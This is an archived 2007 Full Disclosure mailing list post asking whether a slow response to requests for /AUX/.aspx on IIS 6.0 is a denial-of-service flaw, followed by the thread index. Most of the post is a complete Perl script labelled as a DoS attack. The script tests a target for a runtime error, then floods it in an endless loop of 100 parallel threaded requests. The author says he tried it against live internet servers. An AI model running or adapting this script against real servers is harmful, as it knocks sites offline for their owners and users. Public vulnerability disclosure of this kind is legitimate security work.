Full Disclosure mailing list archives
Question Regarding IIS 6.0 / Is this a DoS???
From: "kingcope" <kingcope () gmx net>
Date: Tue, 22 May 2007 07:10:08 +0200
Hello List, Recently I saw a small bug in IIS 6.0 when requesting a special path. When I request /AUX/.aspx the server takes a bit longer to respond as Normally. So I did write an automated script to see what happens if I request this file several times at once. The result is that some servers On the internet get quite instable, some do not. On some servers after I Stop the attack I get an exception that the Server is too busy/Unhandled Exception on the wwwroot (/) path. Can you/the list confirm that? Here is a lame testing script for this stuff: #When sending multiple parallel GET requests to a IIS 6.0 server requesting #/AUX/.aspx the server gets instable and non responsive. This happens only #to servers which respond a runtime error (System.Web.HttpException) #and take two or more seconds to respond to the /AUX/.aspx GET request. # # #signed, #Kingcope kingcope () gmx net ########################################################################## ###*********************************************************************** ### ### ### ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent) ### by Kingcope, May/2007 ### Better run this from a Linux system ########################################################################## use IO::Socket; use threads; if ($ARGV[0] eq "") { exit; } my $host = $ARGV[0]; $|=1; sub sendit { $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 'http(80)', Proto => 'tcp'); print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n"; } $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 'http(80)', Proto => 'tcp'); print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n"; $k=0; while (<$sock>) { if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) { $k=1; last; } } if ($k==0) { print "Server does not seem vulnerable to this attack.\n"; exit; } print "ATTACK!\n"; while(1){ for (my $i=0;$i<=100;$i++) { $thr = threads->new(\&sendit); print "\r\r\r$i/100 "; } foreach $thr (threads->list) { $thr->join; } } _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Question Regarding IIS 6.0 / Is this a DoS??? kingcope (May 21)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? Stan Bubrouski (May 22)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? kingcope (May 22)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? 3APA3A (May 23)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? kingcope (May 23)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? Michael Silk (May 23)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? Richard Moore (May 23)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? 3APA3A (May 23)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? kingcope (May 23)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? kingcope (May 23)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? Stan Bubrouski (May 22)
- <Possible follow-ups>
- Re: Question Regarding IIS 6.0 / Is this a DoS??? 3APA3A (May 23)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? kingcope (May 23)